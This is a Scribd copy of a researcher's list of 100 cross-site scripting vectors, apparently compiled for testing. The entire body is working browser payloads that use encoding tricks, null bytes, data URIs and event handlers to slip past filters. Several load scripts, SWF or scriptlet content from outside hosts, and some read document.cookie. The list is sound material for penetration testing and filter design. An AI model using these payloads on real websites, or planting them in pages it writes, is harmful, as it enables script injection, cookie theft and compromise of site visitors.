Scribd
Upload
197 views

50 New Cross-Site Scripting (XSS) Vectors (100 in Total)

The document provides 100 cross-site scripting (XSS) vectors for testing vulnerabilities. It begins with a brief introduction and then lists the XSS payloads across multiple lines formatted as HTML or JavaScript that could be used to execute malicious scripts on vulnerable sites. The vectors employ various techniques like iframes, scripts, styles, and encodings to potentially exploit XSS flaws.

Uploaded by

Watasow11
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
197 views

50 New Cross-Site Scripting (XSS) Vectors (100 in Total)

The document provides 100 cross-site scripting (XSS) vectors for testing vulnerabilities. It begins with a brief introduction and then lists the XSS payloads across multiple lines formatted as HTML or JavaScript that could be used to execute malicious scripts on vulnerable sites. The vectors employ various techniques like iframes, scripts, styles, and encodings to potentially exploit XSS flaws.

Uploaded by

Watasow11
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 5

100 #XSS Vectors

---------------@soaj1664ashar
Below you will find 100 XSS vectors including 50 new XSS attack vectors. All vec
tors works like charm in Chrome :-) I have also specified browser name alongside
in case of some vectors that do not work in Chrome.
1) <iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>
2) <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
3) <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
4) <sVg><scRipt %00>alert&lpar;1&rpar; {Opera}
5) <img/src=`%00` onerror=this.onerror=confirm(1)
6) <form><isindex formaction="javascript&colon;confirm(1)"
7) <img src=`%00`&NewLine; onerror=alert(1)&NewLine;
8) <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
9) <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
10) <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=
=">
11) <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
12) &#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00
13) <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
14) <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv
="refresh"/>
15) <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')><
/script
16) <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
17) <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
18) <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
19) <form><a href="javascript:\u0061lert&#x28;1&#x29;">X
20) </script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerro
r='eval(src)'>
21) <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
22) <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
23) <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlw
dD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a

24) http://www.google<script .com>alert(document.location)</script


25) <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47
;">XYZ</a
26) <img/src=@&#32;&#13; onerror = prompt('&#49;')
27) <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
28) <script ^__^>alert(String.fromCharCode(49))</script ^__^
29) </style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#3
2; :-(
30) &#00;</form><input type&#61;"date" onfocus="alert(1)">
31) <form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>
32) <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450
')/***/</script /***/
33) <iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>
34) <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLin
e;>X</a>
35) <script ~~~>alert(0%0)</script ~~~>
36) <style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
37) <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
38) <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
39) &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'
40) &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Ope
ra}
41) <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
42) <div/style="width:expression(confirm(1))">X</div> {IE7}
43) <iframe/%00/ src=javaSCRIPT&colon;alert(1)
44) //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><inpu
t/type='submit'>//
45) /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
46) //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </s
cript //|\\
47) </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>
/</style>
48) <a/href="javascript:&#13; javascript:prompt(1)"><input type="X">
49) </plaintext\></|\><plaintext/onmouseover=prompt(1)

50) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29;


{Opera}
I have already tweeted about the following 50 XSS vectors and so far the paste h
as more than 1600 hits (http://pastebin.com/mQDbu7Sm)
________________________________________________________________________________
________________________________________________________________________________
__________________________________________________
51) <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
52) <div onmouseover='alert&lpar;1&rpar;'>DIV</div>
53) <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmous
eover="prompt(1)">
54) <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
55) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/hel
loworld_js_X.pdf">
56) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/h
elloworld_js_X.pdf">
57) <var onmouseover="prompt(1)">On Mouse Over</var>
58) <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here<
/a>
59) <img src="/" =_=" title="onerror='prompt(1)'">
60) <%<!--'%><script>alert(1);</script -->
61) <script src="data:text/javascript,alert(1)"></script>
62) <iframe/src \/\/onload = prompt(1)
63) <iframe/onreadystatechange=alert(1)
64) <svg/onload=alert(1)
65) <input value=<><iframe/src=javascript:confirm(1)
66) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
67) http://www.<script>alert(1)</script .com
68) <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&Ne
wLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab
;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab
;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab
;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&
NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&T
ab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&T
ab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&T
ab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&T
ab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&
Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&

Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%
29></iframe>
69) <svg><script ?>alert(1)
70) <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&T
ab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
71) <img src=`xx:xx`onerror=alert(1)>
72) <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
73) <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
74) <math><a xlink:href="//jsfiddle.net/t846h/">click
75) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=a
lways>
76) <svg contentScriptType=text/vbs><script>MsgBox+1
77) <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
78) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinI
E>
79) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u007
3. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
80) <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></
script a=\u0061 & /=%2F
81) <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u00
61%6C%65%72%74(/XSS/)></script
82) <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
83) <script>+-+-1-+-+alert(1)</script>
84) <body/onload=&lt;!--&gt;&#10alert(1)>
85) <script itworksinallbrowsers>/*<script* */alert(1)</script
86) <img src ?itworksonchrome?\/onerror = alert(1)
87) <svg><script>//&NewLine;confirm(1);</script </svg>
88) <svg><script onlypossibleinopera:-)> alert(1)
89) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97
v&#97script&#x3A;&#97lert(1)>ClickMe
90) <script x> alert(1) </script 1=2
91) <div/onmouseover='alert(1)'> style="x:">
92) <--`<img/src=` onerror=alert(1)> --!>
93) <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69
&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>

94) <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseov


er="prompt(1)" onclick="alert(1)">x</button>
95) "><img src=x onerror=window.open('https://www.google.com/');>
96) <form><button formaction=javascript&colon;alert(1)>CLICKME
97) <math><a xlink:href="//jsfiddle.net/t846h/">click
98) <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
99) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29
%3C%2F%73%63%72%69%70%74%3E"></iframe>
100) <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#
114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#1
02&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#
34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>

You might also like